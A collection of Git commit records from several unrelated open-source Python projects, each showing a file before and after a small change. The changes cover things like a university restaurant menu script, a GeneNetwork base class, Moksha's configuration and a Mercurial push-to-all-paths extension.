tofill = max(width - 4 - len(text), 0)
leftpad = tofill // 2
print('{}[ {} ]{}'.format(
fillchar * leftpad,
text,
fillchar * (tofill - leftpad),
))
# What day
weekdagen = ('ma', 'di', 'wo', 'do', 'vr', 'za', 'zo')
deltas = {'morgen': 1,
'overmorgen': 2,
'volgende': 7}
d = datetime.date.today()
sys.argv.pop(0)
if sys.argv:
if sys.argv[0] in deltas:
d += datetime.timedelta(deltas[sys.argv[0]])
sys.argv.pop(0)
if sys.argv and sys.argv[0][0:2] in weekdagen:
while d.weekday() != weekdagen.index(sys.argv[0][0:2]):
d += datetime.timedelta(1)
# Fetch from API
try:
menu = json.loads(urllib.request.urlopen(
"http://zeus.ugent.be/hydra/api/2.0/resto/menu/nl/{}/{}/{}.json".format(d.year, d.month, d.day)).read().decode(
'utf-8'))
# Print menu
header(str(d), fillchar='=')
header('SOEP')
for s in menu["meals"]:
if s["kind"] == "soup":
print("* {}".format(s["name"]))
header('HOOFDGERECHTEN')
for m in menu["meals"]:
if m["kind"] == "meat":
print("* Vlees: {}".format(m["name"]))
elif m["kind"] == "fish":
print("* Vis: {}".format(m["name"]))
elif m["kind"] == "vegetarian":
print("* Vegetarisch: {}".format(m["name"]))
header('GROENTEN')
for v in menu["vegetables"]:
print("* {}".format(v))
except HTTPError:
exit("Restaurant gesloten")
| mit | Python |
ef62b2c146bb1c8960a3ee700c544d61519998b2 | Remove unreachable conditional | genenetwork/genenetwork2,pjotrp/genenetwork2,pjotrp/genenetwork2,zsloan/genenetwork2,genenetwork/genenetwork2,pjotrp/genenetwork2,genenetwork/genenetwork2,pjotrp/genenetwork2,pjotrp/genenetwork2,zsloan/genenetwork2,genenetwork/genenetwork2,zsloan/genenetwork2,zsloan/genenetwork2 | wqflask/base/GeneralObject.py | wqflask/base/GeneralObject.py | # Copyright (C) University of Tennessee Health Science Center, Memphis, TN.
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License
# as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero General Public License for more details.
#
# This program is available from Source Forge: at GeneNetwork Project
# (sourceforge.net/projects/genenetwork/).
#
# Contact Drs. Robert W. Williams and Xiaodong Zhou (2010)
# at rwilliams@uthsc.edu and xzhou15@uthsc.edu
#
#
#
# This module is used by GeneNetwork project (www.genenetwork.org)
#
# Created by GeneNetwork Core Team 2010/08/10
#
# Last updated by GeneNetwork Core Team 2010/10/20
class GeneralObject:
"""
Base class to define an Object.
a = [Spam(1, 4), Spam(9, 3), Spam(4,6)]
a.sort(lambda x, y: cmp(x.eggs, y.eggs))
"""
def __init__(self, *args, **kw):
self.contents = list(args)
for name, value in kw.items():
setattr(self, name, value)
def __setitem__(self, key, value):
setattr(self, key, value)
def __getitem__(self, key):
return getattr(self, key)
def __getattr__(self, key):
return eval("self.__dict__.%s" % key)
def __len__(self):
return len(self.__dict__) - 1
def __str__(self):
s = ''
for key in self.__dict__.keys():
if key != 'contents':
s += '%s = %s\n' % (key, self.__dict__[key])
return s
def __repr__(self):
s = ''
for key in self.__dict__.keys():
s += '%s = %s\n' % (key, self.__dict__[key])
return s
def __cmp__(self, other):
return len(self.__dict__.keys()).__cmp__(len(other.__dict__.keys()))
| # Copyright (C) University of Tennessee Health Science Center, Memphis, TN.
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License
# as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero General Public License for more details.
#
# This program is available from Source Forge: at GeneNetwork Project
# (sourceforge.net/projects/genenetwork/).
#
# Contact Drs. Robert W. Williams and Xiaodong Zhou (2010)
# at rwilliams@uthsc.edu and xzhou15@uthsc.edu
#
#
#
# This module is used by GeneNetwork project (www.genenetwork.org)
#
# Created by GeneNetwork Core Team 2010/08/10
#
# Last updated by GeneNetwork Core Team 2010/10/20
class GeneralObject:
"""
Base class to define an Object.
a = [Spam(1, 4), Spam(9, 3), Spam(4,6)]
a.sort(lambda x, y: cmp(x.eggs, y.eggs))
"""
def __init__(self, *args, **kw):
self.contents = list(args)
for name, value in kw.items():
setattr(self, name, value)
def __setitem__(self, key, value):
setattr(self, key, value)
def __getitem__(self, key):
return getattr(self, key)
def __getattr__(self, key):
if key in self.__dict__.keys():
return self.__dict__[key]
else:
return eval("self.__dict__.%s" % key)
def __len__(self):
return len(self.__dict__) - 1
def __str__(self):
s = ''
for key in self.__dict__.keys():
if key != 'contents':
s += '%s = %s\n' % (key, self.__dict__[key])
return s
def __repr__(self):
s = ''
for key in self.__dict__.keys():
s += '%s = %s\n' % (key, self.__dict__[key])
return s
def __cmp__(self, other):
return len(self.__dict__.keys()).__cmp__(len(other.__dict__.keys()))
| agpl-3.0 | Python |
c2c1b850c1045d0e57217b074d5ce79dfee78681 | Update moksha's app_cfg | mokshaproject/moksha,lmacken/moksha,pombredanne/moksha,pombredanne/moksha,mokshaproject/moksha,mokshaproject/moksha,lmacken/moksha,lmacken/moksha,ralphbean/moksha,pombredanne/moksha,ralphbean/moksha,pombredanne/moksha,ralphbean/moksha,mokshaproject/moksha | moksha/config/app_cfg.py | moksha/config/app_cfg.py | from tg.configuration import AppConfig, Bunch
import moksha
from moksha import model
from moksha.lib import app_globals, helpers
base_config = AppConfig()
base_config.package = moksha
# Set the default renderer
base_config.default_renderer = 'mako'
base_config.renderers = []
base_config.renderers.append('mako')
# @@ This is necessary at the moment.
base_config.use_legacy_renderer = True
# Configure the base SQLALchemy Setup
base_config.use_sqlalchemy = True
base_config.model = moksha.model
base_config.DBSession = moksha.model.DBSession
# Configure the authentication backend
base_config.auth_backend = 'sqlalchemy'
base_config.sa_auth.dbsession = model.DBSession
base_config.sa_auth.user_class = model.User
base_config.sa_auth.group_class = model.Group
base_config.sa_auth.permission_class = model.Permission
# override this if you would like to provide a different who plugin for
# managing login and logout of your application
base_config.sa_auth.form_plugin = None
| from tg.configuration import AppConfig, Bunch
import moksha
from moksha import model
from moksha.lib import app_globals, helpers
base_config = AppConfig()
base_config.renderers = []
base_config.package = moksha
#Set the default renderer
base_config.default_renderer = 'genshi'
base_config.renderers.append('genshi')
#Configure the base SQLALchemy Setup
base_config.use_sqlalchemy = True
base_config.model = moksha.model
base_config.DBSession = moksha.model.DBSession
# Configure the authentication backend
base_config.auth_backend = 'sqlalchemy'
base_config.sa_auth.dbsession = model.DBSession
base_config.sa_auth.user_class = model.User
base_config.sa_auth.group_class = model.Group
base_config.sa_auth.permission_class = model.Permission
# override this if you would like to provide a different who plugin for
# managing login and logout of your application
base_config.sa_auth.form_plugin = None
| apache-2.0 | Python |
8e5246cf9b95294c56d2ee76bcf25975de144c3b | debug status | tjcsl/mhacksiv | project/utils/status.py | project/utils/status.py | import json
import requests
from project.models import Phone, Alias
def get_alias(phone, shortname):
phon = Phone.query.filter(Phone.phone_number == phone).first()
if phon is None:
print("unknown phone -- using %s" % shortname)
return shortname
alis = Alias.query.filter(Alias.uid == phon.uid and Alias._from == shortname).first()
if alis is None:
print("no alias found -- using %s" % shortname)
return shortname
print("alias found! %s" % repr(alis))
return alis.to
def get_status(wit_json, phone):
wit_json = json.loads(wit_json)
entities = wit_json["outcomes"][0]["entities"]
server = entities["server"][0]["value"]
status_entity = entities["status_item"][0]["value"]
server = get_alias(phone, server)
resp = requests.get("http://%s:5000/%s/" % (server, status_entity)).json()
if type(resp["value"]) == list:
return "\n".join([i["format_string"] % i["value"] for i in resp["value"]])
else:
return resp["format_string"] % resp["value"]
| import json
import requests
from project.models import Phone, Alias
def get_alias(phone, shortname):
phon = Phone.query.filter(Phone.phone_number == phone).first()
if phon is None:
return shortname
alis = Alias.query.filter(Alias.uid == phon.uid and Alias._from == shortname).first()
if alis is None:
return shortname
return alis.to
def get_status(wit_json, phone):
wit_json = json.loads(wit_json)
entities = wit_json["outcomes"][0]["entities"]
server = entities["server"][0]["value"]
status_entity = entities["status_item"][0]["value"]
server = get_alias(phone, server)
resp = requests.get("http://%s:5000/%s/" % (server, status_entity)).json()
if type(resp["value"]) == list:
return "\n".join([i["format_string"] % i["value"] for i in resp["value"]])
else:
return resp["format_string"] % resp["value"]
| apache-2.0 | Python |
7a7c2a069bf6464d3225a0627fe92ce2cd327c5d | fix status | tjcsl/mhacksiv | project/utils/status.py | project/utils/status.py | import json
import requests
def get_alias(phone, shortname):
return shortname
def get_status(wit_json, phone):
wit_json = json.loads(wit_json)
entities = wit_json["outcomes"][0]["entities"]
server = entities["server"][0]["value"]
status_entity = entities["status_item"][0]["value"]
server = get_alias(phone, server)
resp = requests.get("http://%s:5000/%s/" % (server, status_entity)).json()
if type(resp)["value"] == list:
return "\n".join([i["format_string"] % i["value"] for i in resp])
else:
return resp["format_string"] % resp["value"]
| import json
import requests
def get_alias(phone, shortname):
return shortname
def get_status(wit_json, phone):
wit_json = json.loads(wit_json)
entities = wit_json["outcomes"][0]["entities"]
server = entities["server"][0]["value"]
status_entity = entities["status_item"][0]["value"]
server = get_alias(phone, server)
resp = requests.get("http://%s:5000/%s/" % (server, status_entity)).json()
if type(resp) == list:
return "\n".join([i["format_string"] % i["value"] for i in resp])
else:
return resp["format_string"] % resp["value"]
| apache-2.0 | Python |
bdd8eb3f6db0592e9eebca75b595a7128c148faa | Bump Version | whutch/cwmud,whutch/atria | cwmud/__init__.py | cwmud/__init__.py | # -*- coding: utf-8 -*-
"""A modular MUD server."""
# Part of Clockwork MUD Server (https://github.com/whutch/cwmud)
# :copyright: (c) 2008 - 2016 Will Hutcheson
# :license: MIT (https://github.com/whutch/cwmud/blob/master/LICENSE.txt)
from os.path import abspath, dirname
__author__ = "Will Hutcheson"
__contact__ = "will@whutch.com"
__homepage__ = "https://github.com/whutch/cwmud"
__license__ = "MIT"
__docformat__ = "restructuredtext"
VERSION = (0, 4, 0, 0, "Dapper Dan")
def get_version():
"""Return the version string."""
return "{}{}".format(".".join([str(n) for n in VERSION[:3]]),
"" if VERSION[3] == 0
else ".dev{}".format(VERSION[3]))
def get_codename():
"""Return the codename for this version."""
return VERSION[4]
__version__ = "{} ({})".format(get_version(), get_codename())
ROOT_DIR = dirname(dirname(abspath(__file__)))
BASE_PACKAGE = __name__
| # -*- coding: utf-8 -*-
"""A modular MUD server."""
# Part of Clockwork MUD Server (https://github.com/whutch/cwmud)
# :copyright: (c) 2008 - 2016 Will Hutcheson
# :license: MIT (https://github.com/whutch/cwmud/blob/master/LICENSE.txt)
from os.path import abspath, dirname
__author__ = "Will Hutcheson"
__contact__ = "will@whutch.com"
__homepage__ = "https://github.com/whutch/cwmud"
__license__ = "MIT"
__docformat__ = "restructuredtext"
VERSION = (0, 3, 0, 0, "Count Chocula")
def get_version():
"""Return the version string."""
return "{}{}".format(".".join([str(n) for n in VERSION[:3]]),
"" if VERSION[3] == 0
else ".dev{}".format(VERSION[3]))
def get_codename():
"""Return the codename for this version."""
return VERSION[4]
__version__ = "{} ({})".format(get_version(), get_codename())
ROOT_DIR = dirname(dirname(abspath(__file__)))
BASE_PACKAGE = __name__
| mit | Python |
9b8e5e6183ca343b31f4396f0cd7538876f529f2 | add check for large messages | cyberkitsune/PSO2Proxy,alama/PSO2Proxy,alama/PSO2Proxy,flyergo/PSO2Proxy,alama/PSO2Proxy,flyergo/PSO2Proxy,cyberkitsune/PSO2Proxy,cyberkitsune/PSO2Proxy | proxy/PSOCryptoUtils.py | proxy/PSOCryptoUtils.py | from Crypto.Cipher import ARC4, PKCS1_v1_5
from Crypto.PublicKey import RSA
class PSO2RC4(object):
"""docstring for PSO2RC4Decrypter"""
def __init__(self, key):
self.rc4key = key
self.rc4de = ARC4.new(key)
self.rc4en = ARC4.new(key)
def decrypt(self, data):
return self.rc4de.decrypt(data)
def encrypt(self, data):
return self.rc4en.encrypt(data)
class PSO2RSADecrypt(object):
"""docstring for PSO2RSADecrypt"""
def __init__(self, private_key):
try:
key_data = open(private_key).read()
self.key = RSA.importKey(key_data)
print("[CryptoUtils] Loaded RSA decrypter from private_key '%s'." % (private_key,))
except IOError:
print("[CryptoUtils] Unable to load RSA decrypter from private key %s!" % private_key)
def decrypt(self, data):
cipher = PKCS1_v1_5.new(self.key)
try:
return cipher.decrypt(''.join(reversed(data)), None) # For now
except ValueError:
log.msg("Message too large to decrypt")
return None
class PSO2RSAEncrypt(object):
"""docstring for PSO2RSAEncrypt"""
def __init__(self, pubkey):
try:
key_data = open(pubkey).read()
self.key = RSA.importKey(key_data)
print("[CryptoUtils] loaded RSA decrypter from pubkey '%s'." % (pubkey,))
except IOError:
print("[CryptoUtils] Unable to load RSA decrypter from public key %s!" % pubkey)
def encrypt(self, data):
cipher = PKCS1_v1_5.new(self.key)
try:
return ''.join(reversed(cipher.encrypt(data))) # Because MICROSOFT
except ValueError:
log.msg("Message too large to encrypt")
return None
| from Crypto.Cipher import ARC4, PKCS1_v1_5
from Crypto.PublicKey import RSA
class PSO2RC4(object):
"""docstring for PSO2RC4Decrypter"""
def __init__(self, key):
self.rc4key = key
self.rc4de = ARC4.new(key)
self.rc4en = ARC4.new(key)
def decrypt(self, data):
return self.rc4de.decrypt(data)
def encrypt(self, data):
return self.rc4en.encrypt(data)
class PSO2RSADecrypt(object):
"""docstring for PSO2RSADecrypt"""
def __init__(self, private_key):
try:
key_data = open(private_key).read()
self.key = RSA.importKey(key_data)
print("[CryptoUtils] Loaded RSA decrypter from private_key '%s'." % (private_key,))
except IOError:
print("[CryptoUtils] Unable to load RSA decrypter from private key %s!" % private_key)
def decrypt(self, data):
cipher = PKCS1_v1_5.new(self.key)
return cipher.decrypt(''.join(reversed(data)), None) # For now
class PSO2RSAEncrypt(object):
"""docstring for PSO2RSAEncrypt"""
def __init__(self, pubkey):
try:
key_data = open(pubkey).read()
self.key = RSA.importKey(key_data)
print("[CryptoUtils] loaded RSA decrypter from pubkey '%s'." % (pubkey,))
except IOError:
print("[CryptoUtils] Unable to load RSA decrypter from public key %s!" % pubkey)
def encrypt(self, data):
cipher = PKCS1_v1_5.new(self.key)
return ''.join(reversed(cipher.encrypt(data))) # Because MICROSOFT
| agpl-3.0 | Python |
4d1b9e93b485085acc977a3b3cefbad286a2cb7b | Fix wrong select call | qurben/mopidy-headless,avanc/mopidy-headless | mopidy_headless/input.py | mopidy_headless/input.py | from __future__ import unicode_literals
import logging
import threading
from evdev import ecodes, InputDevice, list_devices, categorize
from select import select
logger = logging.getLogger(__name__)
class InputThread(threading.Thread):
def __init__(self):
super(InputThread, self).__init__()
self.name="Input Thread"
self._stop=threading.Event()
self.devices_by_fn={}
self.devices_by_fd={}
self.handlers_by_fd={}
def stop(self):
self._stop.set()
logger.debug("Thread {0} is asked to stop".format(self.name))
def registerHandler(self, handler):
if (handler.device_fn in self.devices_by_fn):
device=self.devices_by_fn[handler.device_fn]
else:
device=InputDevice(handler.device_fn)
self.devices_by_fn[handler.device_fn]=device
self.devices_by_fd[device.fd]=device
self.handlers_by_fd[device.fd]=[]
#Check if device has needed event
capabilities= device.capabilities()
if handler.event_type in capabilities:
if (handler.event_code in capabilities[handler.event_type]):
self.handlers_by_fd[device.fd].append(handler)
return True
else:
logger.warning('Event {0} not found in input device "{1}"'.format(ecodes.bytype[handler.event_type][handler.event_code], device.name))
else:
logger.warning('Input device "{1}" has no capability {0}'.format(ecodes.EV[handler.event_type], device.name))
return False
def run(self):
while not self._stop.isSet():
r,w,x = select(self.devices_by_fd, [], [], 10)
for fd in r:
for event in self.devices_by_fd[fd].read():
for handler in self.handlers_by_fd[fd]:
handler.check(event)
logger.debug("Thread {0} stopped".format(self.name))
class Handler(object):
def __init__(self, device_fn, event_type, event_code):
self.device_fn=device_fn
if (event_type in ecodes.ecodes):
self.event_type=ecodes.ecodes[event_type]
else:
logger.error('Event type {0} unknown'.format(event_type))
if (event_code in ecodes.ecodes):
self.event_code=ecodes.ecodes[event_code]
else:
logger.error('Event {0} not found for {1} events'.format(event_code, event_type))
def check(self, event):
if self.event_type == event.type:
if self.event_code == event.code:
self.handle(event)
def handle(self, event):
pass
| from __future__ import unicode_literals
import logging
import threading
from evdev import ecodes, InputDevice, list_devices, categorize
from select import select
logger = logging.getLogger(__name__)
class InputThread(threading.Thread):
def __init__(self):
super(InputThread, self).__init__()
self.name="Input Thread"
self._stop=threading.Event()
self.devices_by_fn={}
self.devices_by_fd={}
self.handlers_by_fd={}
def stop(self):
self._stop.set()
logger.debug("Thread {0} is asked to stop".format(self.name))
def registerHandler(self, handler):
if (handler.device_fn in self.devices_by_fn):
device=self.devices_by_fn[handler.device_fn]
else:
device=InputDevice(handler.device_fn)
self.devices_by_fn[handler.device_fn]=device
self.devices_by_fd[device.fd]=device
self.handlers_by_fd[device.fd]=[]
#Check if device has needed event
capabilities= device.capabilities()
if handler.event_type in capabilities:
if (handler.event_code in capabilities[handler.event_type]):
self.handlers_by_fd[device.fd].append(handler)
return True
else:
logger.warning('Event {0} not found in input device "{1}"'.format(ecodes.bytype[handler.event_type][handler.event_code], device.name))
else:
logger.warning('Input device "{1}" has no capability {0}'.format(ecodes.EV[handler.event_type], device.name))
return False
def run(self):
while not self._stop.isSet():
r,w,x = select(self.devices_by_fd, [], [], timeout=10)
for fd in r:
for event in self.devices_by_fd[fd].read():
for handler in self.handlers_by_fd[fd]:
handler.check(event)
logger.debug("Thread {0} stopped".format(self.name))
class Handler(object):
def __init__(self, device_fn, event_type, event_code):
self.device_fn=device_fn
if (event_type in ecodes.ecodes):
self.event_type=ecodes.ecodes[event_type]
else:
logger.error('Event type {0} unknown'.format(event_type))
if (event_code in ecodes.ecodes):
self.event_code=ecodes.ecodes[event_code]
else:
logger.error('Event {0} not found for {1} events'.format(event_code, event_type))
def check(self, event):
if self.event_type == event.type:
if self.event_code == event.code:
self.handle(event)
def handle(self, event):
pass
| apache-2.0 | Python |
76f7f84c320722ba1b969fa132196dcdf0132664 | Change empty label for admin supplier module edit | suutari-ai/shoop,suutari-ai/shoop,taedori81/shoop,taedori81/shoop,shoopio/shoop,jorge-marques/shoop,akx/shoop,shawnadelic/shuup,suutari/shoop,hrayr-artunyan/shuup,shoopio/shoop,shawnadelic/shuup,jorge-marques/shoop,suutari/shoop,akx/shoop,hrayr-artunyan/shuup,suutari-ai/shoop,taedori81/shoop,hrayr-artunyan/shuup,suutari/shoop,lawzou/shoop,akx/shoop,jorge-marques/shoop,shoopio/shoop,lawzou/shoop,lawzou/shoop,shawnadelic/shuup | shoop/admin/modules/suppliers/views/edit.py | shoop/admin/modules/suppliers/views/edit.py | # -*- coding: utf-8 -*-
# This file is part of Shoop.
#
# Copyright (c) 2012-2015, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from django import forms
from django.utils.translation import ugettext_lazy as _
from shoop.admin.utils.views import CreateOrUpdateView
from shoop.core.models import Supplier
class SupplierForm(forms.ModelForm):
class Meta:
model = Supplier
exclude = ("module_data",)
widgets = {
"module_identifier": forms.Select
}
class SupplierEditView(CreateOrUpdateView):
model = Supplier
form_class = SupplierForm
template_name = "shoop/admin/suppliers/edit.jinja"
context_object_name = "supplier"
def get_form(self, form_class=None):
form = super(SupplierEditView, self).get_form(form_class=form_class)
choices = self.model.get_module_choices(
empty_label=(_("No %s module") % self.model._meta.verbose_name)
)
form.fields["module_identifier"].choices = form.fields["module_identifier"].widget.choices = choices
return form
| # -*- coding: utf-8 -*-
# This file is part of Shoop.
#
# Copyright (c) 2012-2015, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from django import forms
from django.utils.translation import ugettext_lazy as _
from shoop.admin.utils.views import CreateOrUpdateView
from shoop.core.models import Supplier
class SupplierForm(forms.ModelForm):
class Meta:
model = Supplier
exclude = ("module_data",)
widgets = {
"module_identifier": forms.Select
}
class SupplierEditView(CreateOrUpdateView):
model = Supplier
form_class = SupplierForm
template_name = "shoop/admin/suppliers/edit.jinja"
context_object_name = "supplier"
def get_form(self, form_class=None):
form = super(SupplierEditView, self).get_form(form_class=form_class)
choices = self.model.get_module_choices(
empty_label=(_("Default %s module") % self.model._meta.verbose_name).title()
)
form.fields["module_identifier"].choices = form.fields["module_identifier"].widget.choices = choices
return form
| agpl-3.0 | Python |
cc9fd6e1b34c334d218fcacbf3399c8ffa79c66c | rename a variable to prevent shadowing | StoDevX/cs251-toolkit,StoDevX/cs251-toolkit,StoDevX/cs251-toolkit,StoDevX/cs251-toolkit | cs251tk/referee/__main__.py | cs251tk/referee/__main__.py | from tempfile import gettempdir
import sys
import os
from ..common import chdir
from ..specs import load_some_specs
from .args import process_args
from .process_student import process_student
from .parse_commits import parse_commits_for_assignments
from .emailify import emailify
from .send_email import send_email
def main():
args = process_args()
basedir = os.getcwd()
payload = args['data']
if payload['object_kind'] != 'push':
sys.exit('Not a push event')
name = payload['user_name']
email = payload['user_email']
branch = payload['ref']
repo = payload['project']['git_ssh_url']
commits = payload['commits']
repo_folder = payload['project']['path_with_namespace'].split('/')[-1]
print('processing', repo)
print('before', payload['before'])
print('after', payload['after'])
affected_assignments = parse_commits_for_assignments(commits)
stringified_assignments = [''.join(pair) for pair in affected_assignments]
# print(sorted(stringified_assignments))
specs = load_some_specs(stringified_assignments, basedir)
if not specs:
print('no specs loaded!')
sys.exit(1)
# ensure that two runs of referee with the same repo don't interfere with each other
with chdir(gettempdir()):
# print('working in', os.getcwd())
results, recordings = process_student(repo=repo,
branch=branch,
assignments=stringified_assignments,
folder=repo_folder,
specs=specs,
basedir=basedir,
debug=args['debug'])
print('processing complete')
email_blob = emailify(recordings, name, to=email, debug=args['debug'])
if args['send']:
send_email(email_blob)
print('email sent')
else:
print('Not sending email: no --send flag')
print()
print(email_blob)
| from tempfile import gettempdir
import sys
import os
from ..common import chdir
from ..specs import load_some_specs
from .args import process_args
from .process_student import process_student
from .parse_commits import parse_commits_for_assignments
from .emailify import emailify
from .send_email import send_email
def main():
args = process_args()
basedir = os.getcwd()
payload = args['data']
if payload['object_kind'] != 'push':
sys.exit('Not a push event')
name = payload['user_name']
email = payload['user_email']
branch = payload['ref']
repo = payload['project']['git_ssh_url']
commits = payload['commits']
repo_folder = payload['project']['path_with_namespace'].split('/')[-1]
print('processing', repo)
print('before', payload['before'])
print('after', payload['after'])
affected_assignments = parse_commits_for_assignments(commits)
stringified_assignments = [''.join(pair) for pair in affected_assignments]
# print(sorted(stringified_assignments))
specs = load_some_specs(stringified_assignments, basedir)
if not specs:
print('no specs loaded!')
sys.exit(1)
# ensure that two runs of referee with the same repo don't interfere with each other
with chdir(gettempdir()):
# print('working in', os.getcwd())
results, recordings = process_student(repo=repo,
branch=branch,
assignments=stringified_assignments,
folder=repo_folder,
specs=specs,
basedir=basedir,
debug=args['debug'])
print('processing complete')
email = emailify(recordings, name, to=email, debug=args['debug'])
if args['send']:
send_email(email)
print('email sent')
else:
print('Not sending email: no --send flag')
print()
print(email)
| mit | Python |
a474cca425218cefb6efd39813d1c098bf1417cd | Use PEP-440 compliant version | depop/django-oauth2-provider,depop/django-oauth2-provider,depop/django-oauth2-provider | provider/__init__.py | provider/__init__.py | __version__ = "0.2.7+depop.6.1"
| __version__ = "0.2.7-depop6"
| mit | Python |
75ad8f5b695638be75c27997c349297f681ef68c | fix return value from --version flag | nodepy/nodepy | nodepy/main.py | nodepy/main.py | """
The Node.py command-line interface.
"""
from nodepy.utils import pathlib
from nodepy.loader import PythonModule
import argparse
import code
import os
import pdb
import nodepy
import sys
try:
from urllib.parse import urlparse
except ImportError:
from urllib2 import urlparse
VERSION = 'node.py {} [{} {}]'.format(
nodepy.__version__, nodepy.runtime.implementation, sys.version)
parser = argparse.ArgumentParser()
parser.add_argument('request', nargs='...')
parser.add_argument('--version', action='store_true')
parser.add_argument('--keep-arg0', action='store_true')
parser.add_argument('--nodepy-path', action='append', default=[])
parser.add_argument('--python-path', action='append', default=[])
def _main(argv=None):
args = parser.parse_args(argv)
args.nodepy_path.insert(0, '.')
if args.version:
print(VERSION)
return 0
sys.argv = [sys.argv[0]] + args.request[1:]
ctx = nodepy.context.Context()
ctx.resolvers[0].paths.extend(map(pathlib.Path, args.nodepy_path))
ctx.localimport.path.extend(args.python_path)
with ctx.enter():
if args.request:
url_info = urlparse(args.request[0])
if url_info.scheme in ('http', 'https'):
# Create a new module from a UrlPath filename.
filename = nodepy.utils.UrlPath(args.request[0])
directory = pathlib.Path.cwd()
module = PythonModule(ctx, None, filename, directory)
ctx.modules[module.filename] = module
ctx.main_module = module
else:
ctx.main_module = ctx.resolve(args.request[0])
if not args.keep_arg0:
sys.argv[0] = str(ctx.main_module.filename)
ctx.load_module(ctx.main_module)
else:
filename = nodepy.utils.NoPath('<repl>')
directory = pathlib.Path.cwd()
ctx.main_module = nodepy.base.Module(ctx, None, filename, directory)
ctx.main_module.init()
ctx.main_module.loaded = True
code.interact(VERSION, local=vars(ctx.main_module.namespace))
def main(argv=None, pdb_enabled=False):
if os.getenv('NODEPY_PDB', '') == 'on' or pdb_enabled:
prev_hook = sys.excepthook
def excepthook(*args):
pdb.set_trace()
return prev_hook(*args)
sys.excepthook = excepthook
return _main(argv)
if __name__ == '__main__':
sys.exit(main())
| """
The Node.py command-line interface.
"""
from nodepy.utils import pathlib
from nodepy.loader import PythonModule
import argparse
import code
import os
import pdb
import nodepy
import sys
try:
from urllib.parse import urlparse
except ImportError:
from urllib2 import urlparse
VERSION = 'node.py {} [{} {}]'.format(
nodepy.__version__, nodepy.runtime.implementation, sys.version)
parser = argparse.ArgumentParser()
parser.add_argument('request', nargs='...')
parser.add_argument('--version', action='store_true')
parser.add_argument('--keep-arg0', action='store_true')
parser.add_argument('--nodepy-path', action='append', default=[])
parser.add_argument('--python-path', action='append', default=[])
def _main(argv=None):
args = parser.parse_args(argv)
args.nodepy_path.insert(0, '.')
if args.version:
print(VERSION)
return 1
sys.argv = [sys.argv[0]] + args.request[1:]
ctx = nodepy.context.Context()
ctx.resolvers[0].paths.extend(map(pathlib.Path, args.nodepy_path))
ctx.localimport.path.extend(args.python_path)
with ctx.enter():
if args.request:
url_info = urlparse(args.request[0])
if url_info.scheme in ('http', 'https'):
# Create a new module from a UrlPath filename.
filename = nodepy.utils.UrlPath(args.request[0])
directory = pathlib.Path.cwd()
module = PythonModule(ctx, None, filename, directory)
ctx.modules[module.filename] = module
ctx.main_module = module
else:
ctx.main_module = ctx.resolve(args.request[0])
if not args.keep_arg0:
sys.argv[0] = str(ctx.main_module.filename)
ctx.load_module(ctx.main_module)
else:
filename = nodepy.utils.NoPath('<repl>')
directory = pathlib.Path.cwd()
ctx.main_module = nodepy.base.Module(ctx, None, filename, directory)
ctx.main_module.init()
ctx.main_module.loaded = True
code.interact(VERSION, local=vars(ctx.main_module.namespace))
def main(argv=None, pdb_enabled=False):
if os.getenv('NODEPY_PDB', '') == 'on' or pdb_enabled:
prev_hook = sys.excepthook
def excepthook(*args):
pdb.set_trace()
return prev_hook(*args)
sys.excepthook = excepthook
return _main(argv)
if __name__ == '__main__':
sys.exit(main())
| mit | Python |
a2daf4a378cb379399f82c8b8df70c5b08c321f9 | fix #3 (thanks to natim) | pelletier/hg_publishall | publishall.py | publishall.py | #!/usr/bin/env python
"""allows you to publish on all your repositories.
Requirements:
mercurial
Use:
hg pusha
You can also use hg pushall
Installation:
Add the following entry to the [extensions] bloc of your .hg/hgrc config.
publishall = /path/to/publishall.py
"""
from mercurial.i18n import _
from mercurial import commands, cmdutil, extensions, hg, util
import ConfigParser, os
def pushall(ui, repo, **opts):
"""The Publishall core function. Makes your life easier."""
userrc = os.sep.join([repo.root, '.hg', 'hgrc'])
ini = ConfigParser.RawConfigParser()
ini.read(userrc)
repos = None
if not os.path.exists(userrc):
ui.warn("Unable to find your hgrc file for the current repository.\n")
return 1
try:
repos = ini.items('paths')
except KeyError:
ui.warn("No paths defined in your hgrc. Pushall aborded.\n")
ui.status("%s paths found\n" % len(repos))
for path in repos:
ui.status("* pushing to %s\n" % path[0])
try:
commands.push(ui, repo, path[1], **opts)
except Exception, e:
print e
return 0
aliases = ('pusha','pushall')
command = (
pushall,
[],
_("Push to all your repositories.\n"),
)
cmdtable = {}
# Because I'm SO lazy
for item in aliases:
cmdtable[item] = command
| #!/usr/bin/env python
"""allows you to publish on all your repositories.
Requirements:
mercurial
Use:
hg pusha
You can also use hg pushall
Installation:
Add the following entry to the [extensions] bloc of your .hg/hgrc config.
publishall = /path/to/publishall.py
"""
from mercurial.i18n import _
from mercurial import commands, cmdutil, exntesions, hg, util
import ConfigParser, os
def pushall(ui, repo, **opts):
"""The Publishall core function. Makes your life easier."""
userrc = os.sep.join([repo.root, '.hg', 'hgrc'])
ini = ConfigParser.RawConfigParser()
ini.read(userrc)
repos = None
if not os.path.exists(userrc):
ui.warn("Unable to find your hgrc file for the current repository.\n")
return 1
try:
repos = ini.items('paths')
except KeyError:
ui.warn("No paths defined in your hgrc. Pushall aborded.\n")
ui.status("%s paths found\n" % len(repos))
for path in repos:
ui.status("* pushing to %s\n" % path[0])
commands.push(ui, repo, path[1], **opts)
return 0
aliases = ('pusha','pushall')
command = (
pushall,
[],
_("Push to all your repositories.\n"),
)
cmdtable = {}
# Because I'm SO lazy
for item in aliases:
cmdtable[item] = command | mit | Python |
